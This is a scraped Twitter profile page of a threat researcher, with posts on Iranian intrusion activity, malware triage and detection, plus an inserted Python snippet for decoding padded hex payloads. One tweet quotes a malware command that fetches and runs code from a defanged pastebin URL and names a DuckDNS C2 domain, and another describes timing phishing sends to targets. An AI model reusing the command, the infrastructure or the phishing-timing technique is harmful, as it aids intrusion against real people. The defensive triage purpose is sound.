Nick Carr

@ItsReallyNick

Security person. Adversary tradecraft, threat research, incident response, and trolling at /. co-host:

Washington, DC
Joined September 2009

Tweets


  1. Pinned tweet
    Jan 17

    In response to increased U.S.-Iran tensions & concerns of retaliatory cyber attacks, Iranian intrusion experts & are on for the latest on all things Iran: & active UNC groups 🇮🇷👨‍💻🕵️‍♂️

    Show this thread
  2. Retweeted
    Feb 3

    Teamviewer has been storing user passwords encrypted with AES, not hashed, in the registry accessible to low privilege users on the machine. This works for versions dating from at least as far back as 2012 to the latest version.

    Show this thread
  3. Retweeted
    21 hours ago

    IF you got yourself a shiny Windows 10 environment & wanna find some malwares running in an elevated context, run a historical sweep for ✔️parent process = “wsreset.exe” ✔️process = !”mmc.exe”,!”reg.exe”

  4. Retweeted
    Jan 17
  5. Retweeted
    Feb 3

    Like puzzles? Here's an obfuscated PHP webshell that should scratch that itch.

  6. Retweeted
    Feb 3
  7. Retweeted
    Feb 2
    Replying to

    That's gotta be obnoxious as hell. Here you are trying to exfil documents for industrial espionage, and someone else just rolls up and encrypts it all for a cash grab. It's like the getaway driver for a bank heist getting carjacked while they're waiting.

  8. Retweeted
    Jan 29

    1\ I've written a little compiler to ship ML models as standalone Yara rules, and done proof of concept detectors for Mach-O, RTF files, and powershell scripts. So far I have decision trees, random forests, and logistic regression (LR) working.

    Show this thread
  9. Jan 31

    If you sorta liked the above, you'll LOVE this great new blog from showing legit sites used to host similarly-encoded from persona "robacopony147" 📰

    Show this thread
  10. Jan 31
  11. Retweeted
    Jan 29

    This is a GREAT technique for identifying devices and usage patterns of targets. Send at 8 AM, 9 AM, Noon ... opened on mobile. (Commute and lunch) Send between 10 and noon, opened on full device. Cool, now we know when to send the maldoc.😈

    Show this thread
  13. Jan 30

    The other point here is that you should listen to ' tips on common patterns: If you see: *^*4D, *^*5A, *^*90, *^*00, ... You can save time & breeze through any VBscript & PowerShell decoding from the original paste. You can strip it with a sloppy regex & decode the EXE.

    Show this thread
  14. Jan 30

    You should process these at scale and - outside of training - it's not a good use of time to step through them manually. 👨‍💻btw if you like network infrastructure triage, that DuckDNS C2 resolves to an IP address with :3389 open, serving up an SSL certificate exposing a hostname.

    Show this thread
  15. Jan 30

    Quick visual on triaging a multi-stage payload starting with a persistent scheduled task launching: mshta http:\\pastebin[.]com\raw\JF0Zjp3g ⚠️ note: simple backslash URL trick 💆 know: "4D 5A" (MZ) 🔚 Result: on https://paste[.]ee/r/OaKTX C2: cugugugu.duckdns[.]org

    Show this thread
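Added example, not part of the thread above: a small Python triage helper that strips the `*^*` padding the tweets describe, decodes the remaining hex, and checks for the `4D 5A` (MZ) header before anything else is done with the blob. The sample pastes are constructed; the "PE" one holds only a synthetic header plus filler, not a real executable.

```python
import hashlib
import re

# Constructed samples in the "*^*XX" caret-padded hex style from the thread.
# SAMPLE_PE_PASTE holds only a synthetic 14-byte MZ header plus filler, not a real binary.
SAMPLE_PE_PASTE = "*^*4D*^*5A*^*90*^*00*^*03*^*00*^*00*^*00*^*04*^*00*^*00*^*00*^*FF*^*FF"
SAMPLE_TEXT_PASTE = "*^*48*^*65*^*6C*^*6C*^*6F"  # decodes to "Hello"


def strip_padding(blob: str) -> str:
    """Sloppy regex: drop the '*', '^' and whitespace junk that breaks up the hex stream."""
    return re.sub(r"[*^\s]+", "", blob)


def decode_hex_payload(blob: str) -> bytes:
    """Return the raw bytes behind a padded hex paste; raise if what is left is not hex."""
    cleaned = strip_padding(blob)
    if len(cleaned) % 2 or not re.fullmatch(r"[0-9A-Fa-f]*", cleaned):
        raise ValueError("stripped paste is not an even-length hex string")
    return bytes.fromhex(cleaned)


def triage_paste(blob: str) -> dict:
    """Decode the paste and report size, SHA-256 and whether it starts with 'MZ' (4D 5A)."""
    data = decode_hex_payload(blob)
    return {
        "size": len(data),
        "sha256": hashlib.sha256(data).hexdigest(),
        "is_pe": data[:2] == b"MZ",
    }


if __name__ == "__main__":
    for name, blob in (("pe", SAMPLE_PE_PASTE), ("text", SAMPLE_TEXT_PASTE)):
        print(name, triage_paste(blob))
```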
  16. Retweeted
    Jan 29
    Replying to and others:

    What % of malware uses non-TLS vs TLS for C2? Based on a (super biased) sample of ~10k binaries over 10 years I estimate it’s 90/10. Would love to see someone do a broader, less biased eval to see if it is on the rise (I don’t think it is)

  17. Retweeted
    Jan 29

    🇮🇷 has also used tracking pixels. It isn't a novel technique of course, but it is observed in the wild in targeted threat activity. Even beyond email, communication clients are notorious for leaking information. It's not a bad idea to rigorously test how they behave.

  18. Retweeted

    We’re turning on a tool for key moments of the 2020 US election that enables people to report misleading information about how to participate in an election or other civic event.

    Show this thread
  19. Retweeted
    Jan 28

    We've all received emails with no attachment and assume it's "safe" to open in a mail client (as long as we don't explicitly click on any URLs). Right? Not so much...

    Show this thread
  20. Retweeted
    Jan 29

    discovery of the day: you can apply structure offsets to a selection of code 🤯 select code range, press T, select your structure, be amazed

  21. Jan 29

    This thread contains a lot of info & examples of a highly-skilled red team that really wanted to know their UNC #.
